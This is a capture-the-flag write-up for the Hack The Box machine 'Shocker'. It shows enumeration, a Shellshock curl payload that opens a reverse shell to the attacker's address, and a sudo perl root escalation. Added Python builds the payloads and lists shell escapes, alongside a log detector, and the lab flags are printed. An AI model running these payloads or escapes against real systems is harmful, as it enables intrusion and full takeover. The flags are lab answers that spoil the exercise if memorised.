[HTB] Shocker

Today we are going to hack the HTB machine called Shocker.
  • Video
  • Enumeration
  • To start, we run a full-port nmap scan with service detection to see which ports are open.
    sml@Cassandra:~$ nmap -A -p- 10.10.10.56
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 23:41 CEST
    Nmap scan report for 10.10.10.56
    Host is up (0.037s latency).
    Not shown: 65533 closed ports
    PORT     STATE SERVICE VERSION
    80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
    |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
    |_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 35.10 seconds
    Only HTTP on 80 and SSH on the non-standard port 2222, so we check whether there is anything interesting in Apache, brute-forcing directories and .sh files from the web root:
    sml@Cassandra:~$ gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt -x sh
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://10.10.10.56/
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     sh
    [+] Timeout:        10s
    ===============================================================
    2020/05/09 23:42:24 Starting gobuster
    ===============================================================
    /.htpasswd (Status: 403)
    /.htaccess (Status: 403)
    /cgi-bin/ (Status: 403)
    /server-status (Status: 403)
    ===============================================================
    2020/05/09 23:43:11 Finished
    ===============================================================
    We look inside the cgi-bin directory. The 403 on /cgi-bin/ only means Apache refuses to list it; scripts inside can still be requested by name, so we brute-force there with the .sh extension:
    sml@Cassandra:~$ gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirb/common.txt -x sh
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://10.10.10.56/cgi-bin
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     sh
    [+] Timeout:        10s
    ===============================================================
    2020/05/09 23:44:24 Starting gobuster
    ===============================================================
    /.hta (Status: 403)
    /.hta.sh (Status: 403)
    /.htaccess (Status: 403)
    /.htaccess.sh (Status: 403)
    /.htpasswd (Status: 403)
    /.htpasswd.sh (Status: 403)
    /user.sh (Status: 200)
    ===============================================================
    2020/05/09 23:45:01 Finished
    ===============================================================
    We find the file user.sh, and everything points to us being able to "abuse" Shellshock... A bash script run through Apache's CGI module gets every request header as an environment variable (User-Agent becomes HTTP_USER_AGENT), and a bash vulnerable to CVE-2014-6271 executes whatever follows a function definition "() { :; };" in such a variable.
  • Exploitation
  • We set nc listening:
    sml@Cassandra:~$ nc -nlvp 5555
    In another terminal, we use "Shellshock" against the file user.sh, putting the payload in the User-Agent header (10.10.14.10 is our own address on the HTB VPN):
    sml@Cassandra:~$ curl -H 'User-Agent: () { :; }; /bin/sh -i >& /dev/tcp/10.10.14.10/5555 0>&1' http://10.10.10.56/cgi-bin/user.sh
    We're in :)
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [10.10.14.10] from (UNKNOWN) [10.10.10.56] 36732
    /bin/sh: 0: can't access tty; job control turned off
    $
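    To show both sides of the request above, here is an added example (my own code, not from the original writeup): it builds the header line curl sends, a non-destructive probe variant that returns a marker instead of a shell, and a detector that scans Apache combined-format access logs for the Shellshock function-definition signature. The log lines are constructed for the example, and the "SHOCKED" marker and the Referer-based probe are my own choices.

```python
"""Shellshock (CVE-2014-6271) through Apache CGI: build the probe, detect it in logs.

Added example, not part of the original writeup. Assumes Apache's "combined"
log format; the sample log lines below are constructed, not taken from the box.
"""
import re
from urllib.parse import urlsplit

# Apache "combined" log format:
#   client ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The trigger: a variable whose value starts with "() {" is imported by a
# vulnerable bash as a function, and whatever follows the closing "};" is run.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def shellshock_header(command: str, header: str = "User-Agent") -> str:
    """Header line for the curl step: mod_cgi exports request headers into the
    script's environment (User-Agent -> HTTP_USER_AGENT), so a bash CGI script
    imports the function definition and then runs `command`."""
    return f"{header}: () {{ :; }}; {command}"


def reverse_shell_command(lhost: str, lport: int) -> str:
    """Payload used in the writeup: a reverse shell over bash's /dev/tcp device."""
    return f"/bin/sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"


def safe_probe_command(marker: str = "SHOCKED") -> str:
    """Non-destructive check. The injected command runs before the script body,
    so the two echos close an (empty) CGI header block and the marker lands in
    the response body instead of Apache reporting a malformed header."""
    return f"echo; echo; echo {marker}"


def is_shellshock_response(body: str, marker: str = "SHOCKED") -> bool:
    return marker in body


def scan_access_log(lines):
    """One record per request carrying a Shellshock function definition in the
    request line, Referer or User-Agent. `cgi` marks requests that reached a
    CGI path, where the payload can actually execute; the rest are attempts."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue
        rec = m.groupdict()
        for field in ("agent", "referer", "request"):
            if SHELLSHOCK_RE.search(rec[field]):
                parts = rec["request"].split()
                path = urlsplit(parts[1]).path if len(parts) >= 2 else ""
                hits.append({
                    "client": rec["client"],
                    "time": rec["time"],
                    "path": path,
                    "status": int(rec["status"]),
                    "field": field,
                    "cgi": path.startswith("/cgi-bin/"),
                })
                break
    return hits


# Constructed sample log lines: a gobuster hit, a plain fetch of user.sh, the
# reverse-shell request from the writeup, and a probe against a static page
# delivered via the Referer header (which mod_cgi also exports, as HTTP_REFERER).
SAMPLE_LOG = [
    '10.10.14.10 - - [09/May/2020:23:42:24 +0200] "GET /cgi-bin/ HTTP/1.1" 403 299 "-" "gobuster/3.0.1"',
    '10.10.14.10 - - [09/May/2020:23:45:01 +0200] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.68.0"',
    '10.10.14.10 - - [09/May/2020:23:50:12 +0200] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "'
    + "() { :; }; " + reverse_shell_command("10.10.14.10", 5555) + '"',
    '10.10.14.10 - - [09/May/2020:23:51:00 +0200] "GET /index.html HTTP/1.1" 200 137 "'
    + "() { :; }; " + safe_probe_command() + '" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(shellshock_header(safe_probe_command()))
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

    The detector keys on the function-definition shape rather than on a specific command, so it also catches probes in the Referer or in the request line; the `cgi` flag separates attempts against static paths (noise) from requests that reached a CGI script.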
  • user.txt
  • We explore the system... The shell runs as whatever user Apache runs as, which here is shelly rather than www-data:
    $ id
    uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
    $ cd /home
    $ ls
    shelly
    $ cd shelly
    $ ls
    user.txt
    $ cat user.txt
    2ec24e11320026d1e70ff3e16695b233
  • Privilege Escalation
  • Let's have a look at sudo...
    $ sudo -l
    Matching Defaults entries for shelly on Shocker:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User shelly may run the following commands on Shocker:
        (root) NOPASSWD: /usr/bin/perl
    We see we can run perl as "root" without a password, so we spawn a shell :) perl's exec replaces the perl process with /bin/sh, which keeps the root uid sudo gave it; the /bin/bash -i typed afterwards just upgrades to a nicer interactive shell.
    $ sudo perl -e 'exec "/bin/sh";'
    /bin/bash -i
    bash: no job control in this shell
    root@Shocker:/home/shelly#
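    Reading sudo -l by eye is fine for one entry; as an added example (my own code, not from the writeup), this parses the sudo -l output format shown above and pairs entries that run as root with the shell escape to type. The SHELL_ESCAPES table is a short list of escapes I am confident about, not an exhaustive one (GTFOBins documents many more), and the second sample text is constructed.

```python
"""Parse `sudo -l` output and flag entries that hand over a root shell.

Added example, not part of the original writeup. SHELL_ESCAPES is my own short
list; the SUDO_L_MIXED sample below is constructed.
"""
import os
import re

# One command entry looks like "(root) NOPASSWD: /usr/bin/perl" or "(ALL : ALL) ALL"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$"
)

# Program -> one-liner that execs a shell while keeping the uid sudo granted.
SHELL_ESCAPES = {
    "perl":    "sudo perl -e 'exec \"/bin/sh\";'",        # the route used above
    "python":  "sudo python -c 'import os; os.system(\"/bin/sh\")'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
    "ruby":    "sudo ruby -e 'exec \"/bin/sh\"'",
    "awk":     "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "find":    "sudo find . -exec /bin/sh \\; -quit",
    "vim":     "sudo vim -c ':!/bin/sh'",
    "env":     "sudo env /bin/sh",
    "bash":    "sudo bash",
    "sh":      "sudo sh",
}


def parse_sudo_l(text):
    """Return the command entries listed after 'may run the following commands'.
    The Defaults block is skipped; several comma-separated commands on one line
    become separate entries sharing the same run-as user and tags."""
    entries = []
    in_commands = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()   # "(ALL : ALL)" -> ALL
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in m.group("cmd").split(","):
            entries.append({
                "runas": runas_user,
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return entries


def root_shell_routes(entries):
    """Entries usable as root (run-as root or ALL) whose program, i.e. the first
    word of the command, has a known shell escape, or which allow ALL commands.
    Returns (entry, command-to-type) pairs."""
    routes = []
    for e in entries:
        if e["runas"] not in ("root", "ALL"):
            continue
        if e["command"] == "ALL":
            routes.append((e, "sudo /bin/sh"))
            continue
        prog = os.path.basename(e["command"].split()[0])
        if prog in SHELL_ESCAPES:
            routes.append((e, SHELL_ESCAPES[prog]))
    return routes


# The output shelly got on Shocker (as printed above).
SUDO_L_SHELLY = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
"""

# Constructed sample: a harmless binary, an editor, unrestricted sudo, and an
# interpreter that only runs as a non-root user (so it is not a root route).
SUDO_L_MIXED = """\
User alice may run the following commands on host:
    (root) /usr/bin/id, /usr/bin/vim
    (ALL : ALL) NOPASSWD: ALL
    (www-data) NOPASSWD: /usr/bin/python3
"""

if __name__ == "__main__":
    for entry, cmd in root_shell_routes(parse_sudo_l(SUDO_L_SHELLY)):
        print(f"{entry['command']} as {entry['runas']}: {cmd}")
```

    Note that the matching is on the program's basename, so the full path in the sudoers entry (/usr/bin/perl) and the bare `sudo perl` typed above line up as long as secure_path resolves to the same binary.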
  • root.txt
  • root@Shocker:/home/shelly# cd /root
    root@Shocker:~# ls
    root.txt
    root@Shocker:~# cat root.txt
    cat root.txt
    52c2715605d70c7619030560dc1ca467
  • End
  • And with that we have both the "user" flag and the "root" flag.